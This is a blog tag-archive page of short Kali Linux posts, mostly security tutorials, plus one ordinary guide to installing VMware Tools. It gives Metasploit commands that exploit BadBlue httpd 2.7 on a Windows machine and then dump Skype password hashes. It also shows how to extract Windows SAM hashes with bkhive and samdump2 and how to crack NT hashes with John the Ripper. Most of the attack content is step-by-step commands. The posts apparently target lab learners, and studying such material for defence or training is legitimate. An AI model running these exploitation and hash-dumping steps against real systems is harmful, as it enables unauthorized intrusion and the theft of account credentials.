Tag Archives: Kali

Post Exploitation: Dump Skype Hash with Metasploit using BadBlue httpd 2.7

The video shows how to dump Skype hashes using the Metasploit Framework and BadBlue httpd 2.7. Here are the steps:

  • Exploiting Windows 8 Machine using BadBlue httpd 2.7
  • Use Post Exploitation Skype module to dump the hashes
  • Crack MD5 hashes, as you will not get a plain text password(s)

nmap -sS -sV

msf> use exploit/windows/http/badblue_passthru
msf exploit(badblue_passthru) > set RHOST
msf exploit(badblue_passthru) > exploit

meterpreter > sysinfo
meterpreter > ipconfig
meterpreter > background

msf exploit(badblue_passthru) > search skype
msf exploit(badblue_passthru) > use post/windows/gather/credentials/skype

msf post(skype) > set SESSION 2
msf post(skype) > exploit

How To Install VMware Tools in Kali Linux

Kali Linux is commonly used inside of VMware Workstation, VMware Fusion, and/or VMware Player. These let you stretch the window freely and copy files from the host OS to the guest (Kali) and from the guest to the host. But in order for these features to work, you have to install VMware Tools. This can sometimes be a hard project for beginners.

Open up Terminal and run the command, apt-get update to make sure Kali Linux is up-to-date. After checking its databases, Kali will ask you if you want to install updates, when it does, hit Enter for yes. Do NOT close the Terminal while it’s updating, as this might ruin Kali.

When it’s done updating and you are presented with the root@kali prefix again, type: apt-get install linux-headers-$(uname -r) and hit Enter. You will be prompted if you want to install the latest headers, hit Enter for yes. Wait for it to complete before closing the command window. This step will avoid the “Kernel headers error” when installing VMware tools.

Click Install VMware Tools…/Reinstall VMware Tools… on the submenu and copy the tools file to the “root” folder. Type cd /media/cdrom and hit Enter. Type ls in the same Terminal, and hit Enter. Type cp then copy and paste the name of the VMware tools .tar.gz folder. Then add /root/ to the end. (see example below)

cp VMwareTools-9.6.2-16388356.tar.gz /root/
cd /root/
tar -xf VMwareTools-9.6.2-16388356.tar.gz
cd vmware-tools-distrib


Using bkhive and samdump2

bkhive system /root/hive.txt
samdump2 SAM /root/hive.txt > /root/hash.txt

  1. ls the contents of the /WINDOWS/system32/config directory.
  2. bkhive dumps the syskey bootkey from Windows NT/2k/XP/Vista system hive.
  3. samdump2 dumps the Windows NT/2k/XP/Vista password hashes.

View Hash Contents

cd /root
ls -l *.txt
file *.txt
cat hash.txt

  1. Change directory into /root, because that is where we put our hive and hash files.
  2. List out the files using a wildcard (*).
  3. Determine the file type of the hash and hive files, where the hash file is (ASCII) and the hive file is (Compressed Binary).
  4. View the contents of the hash file


SOURCE: http://www.computersecuritystudent.com/SECURITY_TOOLS/PASSWORD_CRACKING/lesson2/


Password Cracking for noobs: All your hashes are belong to us

As the great philosopher Ludacris said, “if you get hashes, you crack them. it’s a rule.” Welcome to a world where getting a hash should mean you also just owned that account. This is boring if it’s your grandmother’s computer, but way more interesting when it’s a bank. This talk will discuss the basic concepts behind password hashes, how they can be obtained, and what to do with them once you have them. Special attention will be given to demos related to effective hash cracking techniques and introduction to toolsets for making the process as efficient and effective as possible.

Bash commands for Kali:

mkdir NTLM-Project && cd NTLM-Project
wget http://www.alexrams.com/blog/wp-content/uploads/2014/09/sorted.zip
unzip sorted
wget http://www.alexrams.com/blog/wp-content/uploads/2014/09/hashes.txt
john --crack-status --rules --format=nt2 --wordlist=sorted.txt hashes.txt
cd ~/.john
cat john.pot